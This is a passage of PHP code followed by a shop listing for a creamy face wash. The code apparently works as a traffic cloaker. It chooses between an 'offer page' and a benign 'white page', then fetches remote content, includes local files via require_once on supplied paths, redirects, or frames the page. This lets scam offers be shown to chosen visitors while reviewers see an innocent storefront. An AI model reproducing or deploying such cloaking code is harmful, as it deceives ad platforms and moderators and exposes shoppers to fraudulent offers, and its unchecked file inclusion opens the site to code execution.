', '', file_get_contents($body['url_offer_page'], FALSE, create_stream_context()));
} elseif (file_exists($body['url_offer_page'])) {
if (pathinfo($body['url_offer_page'], PATHINFO_EXTENSION) == 'html') {
echo file_get_contents($body['url_offer_page'], FALSE, create_stream_context());
} else {
require_once($body['url_offer_page']);
}
} else {
exit('Offer Page Not Found.');
}
}
if ($body['mode_offer_page'] == 'redirect') {
header('Location: ' . $body['url_offer_page'], TRUE, 302);
exit(0);
}
if ($body['mode_offer_page'] == 'iframe') {
echo '';
exit(0);
}
}
// White Page
if ($body['filter_page'] == 'white') {
if ($body['mode_white_page'] == 'loading') {
if (filter_var($body['url_white_page'], FILTER_VALIDATE_URL)) {
echo str_replace('', '', file_get_contents($body['url_white_page'], FALSE, create_stream_context()));
} elseif (file_exists($body['url_white_page'])) {
if (pathinfo($body['url_white_page'], PATHINFO_EXTENSION) == 'html') {
echo file_get_contents($body['url_white_page'], FALSE, create_stream_context());
} else {
require_once($body['url_white_page']);
}
} else {
exit('White Page Not Found.');
}
}
if ($body['mode_white_page'] == 'redirect') {
header('Location: ' . $body['url_white_page'], TRUE, 302);
exit(0);
}
}
} else {
exit('Offer Page or White Page Not Found.');
}
} else {
exit('Try again later or contact support.');
}
?>
top of page
Botanical Essentials
Creamy Face Wash
5,00 €Price
A sulfate-free creamy facial cleanser that gently removes impurities and makeup without stripping the skin's natural moisture barrier. Enriched with glycerin and oat extract for a soft, clean feel. Packaged in a squeezable tube with a simple cream-colored design.